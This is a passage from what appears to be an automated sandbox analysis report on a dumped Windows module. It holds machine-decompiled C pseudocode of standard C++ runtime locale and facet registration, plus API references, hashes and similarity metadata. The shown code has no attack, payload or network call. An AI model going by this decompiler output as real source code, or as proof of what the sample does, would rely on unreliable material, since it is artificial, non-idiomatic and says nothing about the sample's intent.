																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t858 - 0x14);
																																																											return E6DDF0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6DDE162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6DDB1438(_t739);
																																																													E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de3851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6de3c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6DDE542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6DDF0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t817);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6de96dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t816);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6de96e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t815);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6de96dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t814);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6de96dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t813);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6de96de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t812);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6de96ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t811);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6de96db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t810);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6de96dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t809);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6de96dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t808);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6de96dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6DDD6FD3(__eflags, _t807);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6de96df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6DDD6FD3(__eflags, _t806);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6de96df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6DDD6FD3(__eflags, _t805);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6de96dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6DDD6FD3(__eflags, _t804);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6de96df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6DDD6FD3(__eflags, _t803);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6de96dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6DDD6FD3(__eflags, _t802);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6de96dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6DDD6FD3(__eflags, _t801);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6de96db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6DDD6FD3(__eflags, _t800);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6de96de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6DDD6FD3(__eflags, _t799);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6de96dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF0EE
int.LIBCPMT ref: 6DDDF105

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDF128
std::_Facet_Register.LIBCPMT ref: 6DDDF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF17D

Strings

(km, xrefs: 6DDDF0F9

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (km
API String ID: 1394824916-2527675895
Opcode ID: b38621f8c58576d6d1f6430afdf90b668d47862aa537ab9534da9ad300572510
Instruction ID: 191dba7abbb72576ecd601b09361200ed1ddea008b270fe081a75084b09f103d
Opcode Fuzzy Hash: b38621f8c58576d6d1f6430afdf90b668d47862aa537ab9534da9ad300572510
Instruction Fuzzy Hash: F211A075908129DBCF01FBA4C850ABEB7B4AF45718F260009F615AB390DF7499058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t178 =  *0x6de96cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6DDB161C(0x6de96b38);
				_t133 = _a8;
				_t64 = E6DDB171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t173, _t178, 0x14);
							E6DDD6653( &_v20, 0);
							_t179 =  *0x6de96ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6DDB161C(0x6de96cb8);
							_t140 = _a8;
							_t174 = E6DDB171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t130, _t174, _t179, 0x14);
										E6DDD6653( &_v20, 0);
										_t180 =  *0x6de96cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6DDB161C(0x6de96cbc);
										_t147 = _a8;
										_t175 = E6DDB171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438( &_v32);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t130, _t175, _t180, 0x14);
													E6DDD6653( &_v20, 0);
													_t181 =  *0x6de96cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6DDB161C(0x6de96cc0);
													_t154 = _a8;
													_t176 = E6DDB171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6DDD66BA( &_v20);
														return E6DDF0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6DDDAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6DDB1438(_t158);
																E6DDF3D74( &_v32, 0x6de93504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6de3ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6DDD6FD3(__eflags, _t176);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6de96cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t175);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6de96cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t174);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6de96ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t173);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6de96cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA106
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA110
int.LIBCPMT ref: 6DDDA127

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDA14A
std::_Facet_Register.LIBCPMT ref: 6DDDA161
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA19F

Strings

8km, xrefs: 6DDDA11B

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8km
API String ID: 1394824916-2508146540
Opcode ID: 61d965d0b940011df751e21851c8305917db2bac9307343ea9826787455f279a
Instruction ID: da27d7a267206f276a88000143b8ebca5613b52e68df2a0c1e3a5d993624db8b
Opcode Fuzzy Hash: 61d965d0b940011df751e21851c8305917db2bac9307343ea9826787455f279a
Instruction Fuzzy Hash: 0611E071809119DBCF01FBA4C840EBEB7B5AF54318F264009F510AB290DF749A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t902 - 0x14, 0);
				_t861 =  *0x6de96db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6DDB161C(0x6de96d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6DDD66BA(_t902 - 0x14);
					return E6DDF0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6DDE0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t902 - 0x20);
							E6DDF3D74(_t902 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t840, _t861, 0x14);
							E6DDD6653(_t902 - 0x14, 0);
							_t862 =  *0x6de96dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6DDB161C(0x6de96b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6DDD66BA(_t902 - 0x14);
								return E6DDF0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6DDE0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t902 - 0x20);
										E6DDF3D74(_t902 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t637, _t841, _t862, 0x14);
										E6DDD6653(_t902 - 0x14, 0);
										_t863 =  *0x6de96de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6DDB161C(0x6de96d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6DDD66BA(_t902 - 0x14);
											return E6DDF0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6DDE0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t902 - 0x20);
													E6DDF3D74(_t902 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t637, _t842, _t863, 0x14);
													E6DDD6653(_t902 - 0x14, 0);
													_t864 =  *0x6de96db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6DDB161C(0x6de96d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6DDD66BA(_t902 - 0x14);
														return E6DDF0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6DDE0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t902 - 0x20);
																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t637, _t843, _t864, 0x14);
																E6DDD6653(_t902 - 0x14, 0);
																_t865 =  *0x6de96dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6DDB161C(0x6de96d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6DDD66BA(_t902 - 0x14);
																	return E6DDF0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6DDE0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t902 - 0x20);
																			E6DDF3D74(_t902 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t637, _t844, _t865, 0x14);
																			E6DDD6653(_t902 - 0x14, 0);
																			_t866 =  *0x6de96dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6DDB161C(0x6de96d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6DDD66BA(_t902 - 0x14);
																				return E6DDF0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6DDE0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t902 - 0x20);
																						E6DDF3D74(_t902 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t637, _t845, _t866, 0x14);
																						E6DDD6653(_t902 - 0x14, 0);
																						_t867 =  *0x6de96df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6DDB161C(0x6de96d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6DDD66BA(_t902 - 0x14);
																							return E6DDF0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6DDE1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t902 - 0x20);
																									E6DDF3D74(_t902 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t637, _t846, _t867, 0x14);
																									E6DDD6653(_t902 - 0x14, 0);
																									_t868 =  *0x6de96dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6DDB161C(0x6de96d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6DDD66BA(_t902 - 0x14);
																										return E6DDF0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6DDE10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t902 - 0x20);
																												E6DDF3D74(_t902 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t637, _t847, _t868, 0x14);
																												E6DDD6653(_t902 - 0x14, 0);
																												_t869 =  *0x6de96df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6DDB161C(0x6de96da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6DDD66BA(_t902 - 0x14);
																													return E6DDF0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6DDE1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t902 - 0x20);
																															E6DDF3D74(_t902 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t637, _t848, _t869, 0x14);
																															E6DDD6653(_t902 - 0x14, 0);
																															_t870 =  *0x6de96df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6DDB161C(0x6de96da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6DDD66BA(_t902 - 0x14);
																																return E6DDF0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6DDE11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t902 - 0x20);
																																		E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t637, _t849, _t870, 0x14);
																																		E6DDD6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6de96dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6DDB161C(0x6de96d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6DDD66BA(_t902 - 0x14);
																																			return E6DDF0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6DDE1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t902 - 0x20);
																																					E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																					asm("int3");
